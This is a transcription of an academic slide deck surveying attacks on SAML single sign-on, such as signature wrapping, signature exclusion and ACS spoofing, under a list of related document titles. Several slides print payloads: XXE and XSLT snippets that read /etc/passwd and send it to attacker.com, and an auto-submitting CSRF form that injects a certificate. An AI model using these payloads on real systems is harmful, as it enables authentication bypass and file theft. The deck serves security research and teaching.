Practical Security Evaluation of SAML-based Single Sign-On Solutions

Similar documents
Automatic Recognition, Processing and Attacking of Single Sign-On Protocols with Burp Suite

Web Based Single Sign-On and Access Control

Single Sign-On Implementation Guide

National Identity Exchange Federation. Web Browser User-to-System Profile. Version 1.0

VETUMA SAML SAMPLE MESSAGES

Configuring SAML2 for Single Sign-On to Smartsheet (Enterprise Only)

On Breaking SAML: Be Whoever You Want to Be OWASP The OWASP Foundation Juraj Somorovsky and Christian Mainka

Configuring SAML2 for Single Sign-On to Smartsheet (Enterprise Only)

Setting Up Federated Identity with IBM SmartCloud

How to create a SP and a IDP which are visible across tenant space via Config files in IS

Single Sign-On Implementation Guide

Single Sign-On Implementation Guide

This section includes troubleshooting topics about single sign-on (SSO) issues.

IBM WebSphere Application Server

Lecture Notes for Advanced Web Security 2015

Single Sign on Using SAML

Feide Technical Guide. Technical details for integrating a service into Feide

Configuring Single Sign-on from the VMware Identity Manager Service to WebEx

Web Single Sign-On Authentication using SAML

This chapter describes how to use the Junos Pulse Secure Access Service in a SAML single sign-on deployment. It includes the following sections:

Federal Identity, Credential, and Access Management Security Assertion Markup Language (SAML) 2.0 Web Browser Single Sign-on (SSO) Profile

SAML Authentication within Secret Server

Security Assertion Markup Language (SAML) 2.0 Technical Overview

How To Test For A Signature On A Password On A Webmail Website In Java (For Free)

IAM Application Integration Guide

Configuring EPM System for SAML2-based Federation Services SSO

Web Access Management and Single Sign-On

SAML Single-Sign-On (SSO)

Copyright: WhosOnLocation Limited

Martin Käser. Single Sign-on mit OpenSAML

Federal Identity, Credentialing, and Access Management Security Assertion Markup Language (SAML) 2.0 Web Browser Single Sign-on (SSO) Profile

SAML Security Analysis. Huang Zheng Xiong Jiaxi Ren Sijun

INUVIKA OPEN VIRTUAL DESKTOP ENTERPRISE

MLSListings Single Sign On Implementation Guide. Compatible with MLSListings Applications

Is SAML An Effective Framework For Secure SSO? Category: Security Technology Secure Access And Defenses

SAML-Based SSO Solution

Liberty Alliance. CSRF Review. .NET Passport Review. Kerberos Review. CPSC 328 Spring 2009

OpenLogin: PTA, SAML, and OAuth/OpenID

Using SAML for Single Sign-On in the SOA Software Platform

Single Sign-On Implementation Guide

Secure Single Sign-On

Computer Systems Security 2013/2014. Single Sign-On. Bruno Maia Pedro Borges

NT Authentication Configuration Guide

Configuring Single Sign-on from the VMware Identity Manager Service to ServiceNow

Secure Services withapache CXF

On Breaking SAML: Be Whoever You Want to Be

Design and Implementaion of a Single Sign-On Library Supporting SAML (Security Assertion Markup Language) for Grid and Web Services Security

Tusker IT Department Tusker IT Architecture

Safewhere*Identify 3.4. Release Notes

Federation architectures for mobile applications OAuth 2.0 Drivers OAuth 2.0 Overview Mobile walkthrough

Federating with Web Applications

Shibboleth Architecture

Gateway Apps - Security Summary SECURITY SUMMARY

SAML 2.0 protocol deployment profile

SAML Security Option White Paper

Security Assertion Markup Language (SAML)

TIB 2.0 Administration Functions Overview

Kantara egov and SAML2int comparison

IBM Tivoli Federated Identity Manager V6.2.2 Implementation. Version: Demo. Page <<1/10>>

Biometric Single Sign-on using SAML Architecture & Design Strategies

Get Success in Passing Your Certification Exam at first attempt!

SAML Profile for SSO in Danish Public Sector V2.0 Assertion Examples,

Open Source Identity Integration with OpenSSO

Security Assertion Markup Language (SAML) V2.0 Technical Overview

JVA-122. Secure Java Web Development

Ameritas Single Sign-On (SSO) and Enterprise SAML Standard. Architectural Implementation, Patterns and Usage Guidelines

Using Foundstone CookieDigger to Analyze Web Session Management

DocuSign Information Guide. Single Sign On Functionality. Overview. Table of Contents

Negotiating Trust in Identity Metasystem

Guardians of the Clouds: When Identity Providers Fail

Single Sign On (SSO) Implementation Manual. For Connect 5 & MyConnect Sites

The increasing popularity of mobile devices is rapidly changing how and where we

Single Sign-On for the UQ Web

Zendesk SSO with Cloud Secure using MobileIron MDM Server and Okta

SAML (Security Assertion Markup Language) Security Model for RESTful Web Services

Den Gode Webservice - Security Analysis

OIOIDWS for Healthcare Token Profile for Authentication Tokens

Symplified I: Windows User Identity. Matthew McNew and Lex Hubbard

DocuSign Single Sign On Implementation Guide Published: March 17, 2016

Egnyte Single Sign-On (SSO) Installation for OneLogin

Flexible Identity Federation

Federated Identity Management and Shibboleth. Noreen Hogan Asst. Director Enterprise Admin. Applications

Web Services Security: OpenSSO and Access Management for SOA. Sang Shin Java Technology Evangelist Sun Microsystems, Inc. javapassion.

MONDESIR Eunice WEILL-TESSIER Pierre FEDERATED IDENTITY. ASR 2006/2007 Final Project. Supervisers: Maryline Maknavicius-Laurent, Guy Bernard

SAML 2.0 INT SSO Deployment Profile

Mobile Security. Policies, Standards, Frameworks, Guidelines

AAI for Mobile Apps How mobile Apps can use SAML Authentication and Attributes. Lukas Hämmerle

Standalone SAML Attribute Authority With Shibboleth

Authentication Integration

Logout in Single Sign-on Systems

Enabling Federation and Web-Single Sign-On in Heterogeneous Landscapes with the Identity Provider and Security Token Service Supplied by SAP NetWeaver

Alfresco Share SAML. 2. Assert user is an IDP user (solution for the Security concern mentioned in v1.0)

Using Voltage Secur

PingFederate. Salesforce Connector. Quick Connection Guide. Version 4.1

STUDY ON IMPROVING WEB SECURITY USING SAML TOKEN

Implementation Guide SAP NetWeaver Identity Management Identity Provider

Разработка программного обеспечения промежуточного слоя. TERENA BASNET Workshop, November 2009 Joost van Dijk - SURFnet

Transcription:

Practical Security Evaluation of SAML-based Single Sign-On Solutions Vladislav Mladenov, Andreas Mayer, Marcus Niemietz, Christian Mainka, Florian Feldmann, Julian Krautwald, Jörg Schwenk 1

Single Sign-On Attacks on SPs Attacks on IdPs Future Work 2

Single Sign-On Username/Password 3 User 3

Single Sign-On Service Provider 1 Service Provider 2 Username/ Password Token Token Service Provider 3 Identity Provider User Service Provider 4 Service Provider 5 4

Single Sign-On Identity Provider Client Service Provider GET Resources Token Request Token Request Authentifizierung Token Token Resources [TLS] [TLS] 5

Login Architecture Username/ Password Service Provider WEB Frontend Session Management Authorization & Access Module Ressources Single Sign-On Database 6

Login Architecture Username/ Password Service Provider WEB Frontend Session Management Authorization & Access Module Ressources Single Sign-On Single Sign-On Database Parser Verifier Processor 7

Single Sign-On Attacks on SPs Attacks on IdPs Future Work 8

Attacks on SPs Identity Provider Client Service Provider 1. GET Resources 3. Token Request 2. Token Request 4. Authentifizierung 5. Token 6. Token 7. Resources [TLS] [TLS] 9

Goals Unauthorized access to restricted resources on the SP Security relevant parameters in the token: Timestamps/Nonces Information about the authenticated subject Information about the recipient of the token Information about the issuer of the token Signature/HMAC Keys 10

Replay Attacks Requirements: The attacker has a valid token How it works: The attacker reuses the token for infinite amount of time Success if: An expired token is accepted saml:response saml:assertion saml:subject Bob saml:conditions timestamps recipient saml:signature ds:key ID=111 Ref=111 11

Replay Attacks Username/ Password Service Provider WEB Frontend Session Management Authorization & Access Module Ressources Single Sign-On Single Sign-On Database Parser Verifier Processor 12

Signature Exclusion Requirements: No requirements How it works: The attacker creates a token Success if: An unsigned token is accepted saml:response saml:assertion saml:subject Bob saml:conditions timestamps recipient saml:signature ID=111 Ref=111 ds:key 13

Signature Exclusion Username/ Password Service Provider WEB Frontend Session Management Authorization & Access Module Ressources Single Sign-On Single Sign-On Database Parser Verifier Processor 14

Certificate Faking Requirements: No requirements How it works: The attacker creates a token and signs it with his private key Success if: A token signed with an untrusted key is accepted saml:response saml:assertion saml:subject Bob saml:conditions timestamps recipient saml:signature ds:key ID=111 Ref=111 15

Certificate Faking Username/ Password Service Provider WEB Frontend Session Management Authorization & Access Module Ressources Single Sign-On Single Sign-On Database Parser Verifier Processor 16

Token Recipient Confusion Requirements: The attacker has a valid token for a ServiceA ServiceA and ServiceB trust the same IdP How it works: The sends the token to ServiceB Success if: ServiceB accepts the token generated for ServiceA saml:response saml:assertion saml:subject Bob saml:conditions timestamps Recipient=SA saml:signature ID=111 Ref=111 ds:key 17

Token Recipient Confusion Username/ Password Service Provider WEB Frontend Session Management Authorization & Access Module Ressources Single Sign-On Single Sign-On Database Parser Verifier Processor 18

XML Signature Wrapping Requirements: The attacker has a valid token How it works: The attacker injects malicious content in the token without invalidating the signature Success if: The token is successfuly verified and the malicious content is processed saml:response saml:assertion saml:subject Bob Admin saml:signature ds:key saml:assertion saml:subject ID=111 ID=666 Ref=111 ID=111 Bob 19

XML Signature Wrapping Username/ Password Service Provider WEB Frontend Session Management Authorization & Access Module Ressources Single Sign-On Single Sign-On Database Parser Verifier Processor 20

XE XML Entity <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd"> <html> <head> <title>xe</title> </head> <body> 2 < 3 2 < 3 </body> </html> 25 21

XE XML Entity <!DOCTYPE foo [ <!ENTITY name "Bob" > ]> <Envelope> <Body> <order> <name>&name;</name> </order> </Body> </Envelope> Client <Envelope> <Body> Thank you Bob </Body> </Envelope> Server 25 22

XXE XML External Entity Attacks <!DOCTYPE order [<!ENTITY name SYSTEM c:\boot.ini >]> <Envelope> <Body> <order> <name>&name;</name> <product>computer</product> </order> </Body> </Envelope> Client <Envelope> <Body> Thank you [ c:\boot.ini ] </Body> </Envelope> Server Envelope Body order name [C:\boot.ini] 26 23

XML External Entity (XXE) Requirements: No requirements How it works: The attacker sends malicious XML content to the SP Success if: The attacker can access resources stored on the filesystem of the SP <? xml version = " 1.0 " encoding = " utf 8"? > <!DOCTYPE Response[ <!ENTITY file SYSTEM "/etc/passwd" > <!ENTITY send SYSTEM "http://attacker.com/?read=&file;" > ]> <samlp:response> < attack>&send;</attack> </samlp:response> 24

XML External Entity (XXE) Username/ Password Service Provider WEB Frontend Session Management Authorization & Access Module Ressources Single Sign-On Single Sign-On Database Parser Verifier Processor 25

XSLT Requirements: No requirements How it works: The attacker sends malicious XML content to the SP Success if: The attacker can access resources stored on the filesystem of the SP saml:response saml:assertion ds:signature ds:transform <xsl:stylesheet xmlns:xsl="..."> <xsl:template match="doc"> <xsl:variable name="file select="unparsed-text('/etc/passwd')"/> <xsl:variable name="escaped select="encode-for-uri($file)"/> <xsl:variable name="attackerurl select="'http://attacker.com/'"/> <xsl:variable name="exploiturl select="concat($attackerurl,$escaped)"/> <xsl:value-of select="unparsed-text($exploiturl)"/> </xsl:template> </xsl:stylesheet> XSLT Payload 26

XSLT Username/ Password Service Provider WEB Frontend Session Management Authorization & Access Module Ressources Single Sign-On Single Sign-On Database Parser Verifier Processor 27

Certificate Injection Cross-site-request-frogery (CSRF) https://bank.com/payments/?name=rub&iban=1111&payment=20 Host: bank.com Path: https://bank.com/payments Parameters: name=rub iban=1111 payment=20 28

Certificate Injection Cross-site-request-frogery (CSRF) https://bank.com/payments/?name=evil&iban=666&payment=200 Host: bank.com Path: https://bank.com/payments Parameters: name=evil iban=666 payment=200 29

Certificate Injection Requirements: No requirements How it works: The attacker sends valid token signed with his private key Success if: The token is successfully verified 30

Certificate Injection Username/ Password Service Provider WEB Frontend Session Management Authorization & Access Module Ressources Single Sign-On Database 31

Certificate Injection <html> <head></head> <body onload="document.forms[0].submit()"> <form method="post" enctype="multipart/form-data" action="https://sp_url.com"> <input type="text" name="mode" value="samlupdate" /> <input type="text" name="samlfname" value="" /> <input type="text" name="bizcpn" value= XSRF TOKEN EINSETZEN! (nicht validiert)" /> <input type="text" name="samlloginurl" value= SAML LOGIN URL EINSETZEN!" /> <input type="text" name="samllogouturl" value= SAML LOGOUT URL EINSETZEN!" /> <input type="text" name="chpasswdurl" value= PASSWORD CHANGE URL EINSETZEN!" /> <input type="file" name="samlupload" value="" /> <input type="text" name="publickey" value= ENCODIERTES ZERTIFIKAT EINSETZEN!" /> <input type="text" name="algorithm" value="rsa" /> </form></body></html> 32

Single Sign-On Attacks on SPs Attacks on IdPs Future Work 35

Attacks on IdPs Identity Provider Client Service Provider GET Resources Token Request Token Request Authentifizierung Token Token Resources [TLS] [TLS] 36

Attacks on IdPs Username/ Password Token Token Identity Provider User 37

ACS Spoofing Identity Provider Client Attacker Service Provider GET Resources Token Request GET Resources Token Request Token Request Authentifizierung Token Token Token [TLS] [TLS] Resources [TLS] 38

ACS Spoofing http://www.onelogin.com?samlrequest=fzjn T%2BMwEIbvSPwHy%2Fd8tMvHympSdUGISuw S0cCBm%2BtMUwfbk%2FU4zfLvSVMq2Euv45n 3fd7xzOb%2FrGE78KTRZXwSp5yBU1hpV2f8ub ylfvj5fn42i2lnkxzd2lon%2bnsbbtzmohljq8 Y77wRK0iSctEAiKLFa%2FH4Q0zgVrceACg1ny9 umy7rcdam2%2bs0bwrtppk2uadeovjw2ruq1b evgimcvr6zphmtj1mhsuzaudku0vy7si2h6v U5%2BiMuJuLx65az4dPql3SHBKaz1oYnEfVkW UfG4KkeBna7A%2Fxm6M14j1gZihZazBRH4MO DcoKPOgl%2BB32kFz08PGd%2BG0JJIkr7v46% 2BhRCaEpod17DCRivYZCkmkd4N28B3wfNyrG KP5bws9DS6PKDz%2FMpsl36Tyz%2F%2Fax1j efmi0emcly7c%2f8sdd0z7dobcynhbbv3qvb czw0tlqqemnhoqzjd%2b4%2fn8yw7l8aa%3 D%3D <samlp:authnrequest ID="agdobjcfikneommfjamdclenj" Version="2.0" IssueInstant="2013-04-17T9:30:00Z" AssertionConsumerServiceURL= "https://www.evildomain.com/"> <saml:issuer> http://google.com </saml:issuer> </samlp:authnrequest> 39

XSS/CSRF/Clickjacking Identity Provider Client ( ) Authentifizierung Session Cookie Token Token [TLS] 40

XSS/CSRF/Clickjacking Identity Provider Client Attacker ( ) Authentifizierung Session Cookie Session Cookie Token Session Cookie Token 41

Single Sign-On Attacks on SPs Attacks on IdPs Future Work 43

Penetration Tests New methods for penetration tests of SSO systems are needed New tools should be developed SAML attacker OpenID attacker ACSScanner TLS channel bindings Holder-of-Key TLS-Unique SLSOP 44

Questions!? 45

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information